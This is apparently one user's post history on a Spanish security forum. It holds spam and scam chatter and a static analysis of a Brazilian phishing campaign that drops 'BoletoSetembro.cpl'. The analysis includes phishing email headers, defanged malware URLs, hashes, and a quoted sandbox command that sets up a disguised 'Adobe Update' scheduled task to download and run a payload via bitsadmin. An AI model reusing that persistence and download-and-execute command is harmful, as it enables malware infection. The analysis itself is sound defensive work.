Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - r32

Páginas 1 ... 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 ... 118
#701
Sugerencias y dudas sobre el Foro / Re: Spam en el foro
23 Septiembre 2014, 20:24 PM
CitarInsertar Cita
no es un bot, lo triste es que es una persona, que se ha tirado dos horas para escirbir 40 mensajes y ser borrados minutos después con un click.
Estuve viendo los movimientos que hacia por el foro, iva a seguridad donde le respondi con lo de asno, para mi no era un bot, pero no podía demostrarlo.

Citarjajajaja, no demos más publicidad de la necesaria a los 'ASNO-DDoS Team', luego podrian crecerse xD.

Cierto, pero bueno el HEMOAL les irá bien para los picores vaginales  :-X.

Saludos.
#702
Sugerencias y dudas sobre el Foro / Re: Spam en el foro
23 Septiembre 2014, 08:16 AM
Son el clan de ASNOS, a ver si hablo con elgun mod global.
Gracias por borrar los que pudiste elektro :)
#703
Sugerencias y dudas sobre el Foro / Re: no puedo entrar a la web
23 Septiembre 2014, 00:31 AM
Miedo? mas bien risa y de la buena, que merecido se lo tiene, por asno.
#704
Sugerencias y dudas sobre el Foro / Re: no puedo entrar a la web
22 Septiembre 2014, 19:17 PM
Visiten su Facebook, se reiran un rato con los comentarios de eradicate.malware:

https://www.facebook.com/h4x0rZ1337

:laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh:

No va a poder borrar tanto mensaje, el otro dia tuve que eliminar algunos del foro de su clan de ASNOS.
#705
Foro Libre / Re: Aviso sobre estafa de trabajo (atención al cliente jazztel)
21 Septiembre 2014, 00:47 AM
Es lo más similar a las estafas piramidales solo que con empresas que se suponen tienen que ser serias.
Demasiada competéncia hace que las empresas aprobechen es punto débil, pruebas, que si clientes de cleintes de cleintes, aportando a clientes, jazztel lo ofrece mucho, por lo menos a mi mail.

Te deseo lo mismo, suerte y a ver si topas con alguna empresa seria, un portal donde veo bastante demanda de empleo en cuanto a informatica es infojobs, si la conoces no he dicho nada.

Saludos.
#706
Análisis y Diseño de Malware / Re: BoletoSetembro.cpl
20 Septiembre 2014, 03:25 AM
Han cambiado de estrategia, han subido un geolocalizador de ip´s, tienen su ftp, aqui el paste con los datos:

VT: https://www.virustotal.com/es/file/7f72782d38e79a70111c0d9ab6bb1b73825e10651d46e6d06e356c3cf19910c5/analysis/1411175821/
AI: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&call=first
Traffic: https://anubis.iseclab.org/?action=result&task_id=1b25f2bb32a44c174adaf3b4046176398&download=traffic.pcap

Name                         Query Type        Query Result   
geoip.s12.com.br        DNS_TYPE_A      23.246.231.82

FTP: xftp://geoip.s12.com.br

http://pastebin.com/rTWPZ24q

A ver que sorpresita esconde, aun no he mirado del todo.
#707
Seguridad / Re: Juego básico para el aprendizaje de Seguridad Informática
19 Septiembre 2014, 12:48 PM
Gracias, está divertido pero ojalá todos los escenarios se solucionasen con el simple hecho de tener antivirus y firewall, hay casos mucho más complejos.
En la práctica va bien, no quería desprestigiar, esta bien conseguido y recorre básicamente todos los escenarios comunes.

Saludos.
#708
Análisis y Diseño de Malware / Re: BoletoSetembro.cpl
5 Septiembre 2014, 18:43 PM
Envié el archivo "bitsadmin.exe" a Kaspersky Lab para que le echaran un vistazo, no era normal que descargase ese ejecutable.
La respuesta fue que no ven nada raro en el comportamiento de ese ejecutable, pero.....
Si lo descarga es para algo, no? si nos fijamos bien en las funciones que puede llegar a realizar vemos que lo utiliza como túnel, a traves de el, crea un proceso y utiliza las funciones necesarias, veamos que puede hacer.
Si echamos un vistazo a la MSDN vemos todas las funciones que puede llegar a usar:

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Puede hacer uso de red, listado de archivos, conexión bajo proxy.
Aquí un listado más completo de sus funciones:

http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx

BITSAdmin Tool segun veo es para win XP, lo podemos descargar en este paquete:

Windows XP Service Pack 2 Support Tools:
Descarga: http://www.microsoft.com/en-us/download/details.aspx?id=18546
D.Directa: http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe

Podemos extraerlo con winrar por ejemplo:



Ahora solo tenemos que volver a extraer el contenido del archivo "support.cab" (4.699 KB), aparecerán todos los archivos incluido "bitsadmin.exe".



Vemos que, tanto peso, como hash coinciden, no han tocado para nada ese ejecutable, por eso comentaba lo del puente.
El archivo "BoletoSetembro.cpl" es el que lo controla, aunque aun no he podido probarlo.

Otro archivo que descarga es una dll (Anonymizer.dll), desde aquí:
hxtp://gerenciador2015.com.br/a001/Anonymizer.dll
(SHA256:    6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597)

Otro 0/55:
VT: https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/

AI: https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6

CitarProcesses Created:    
Executable    Command Line
C:\WINDOWS\system32\regsvr32.exe   regsvr32.exe /u /s .\d1.tmp.dll

Realiza muchisimos cambios esta dll.

Saludos.
#709
Análisis y Diseño de Malware / BoletoSetembro.cpl
2 Septiembre 2014, 20:07 PM
Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.

Aquí el código del mensaje de hotmail:
Código [Seleccionar]
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id

=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com

with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <[color=#FF0000]mixelyx@hotmail.com[/color]> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php

"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png

" alt=""></a> <p><img src="
hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>

VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com
Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:
Citar"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55
CitarEl archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.
#710
Análisis y Diseño de Malware / Re: Porblema con Troyano URGENTE!
22 Julio 2014, 13:09 PM
Aquí también tienes algunas herramientas que te pueden ayudar:

https://foro.elhacker.net/seguridad/guia_rapida_para_descarga_de_herramientas_gratuitas_de_seguridad_y_desinfeccion-t382090.0.html

Saludos.
Páginas 1 ... 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 ... 118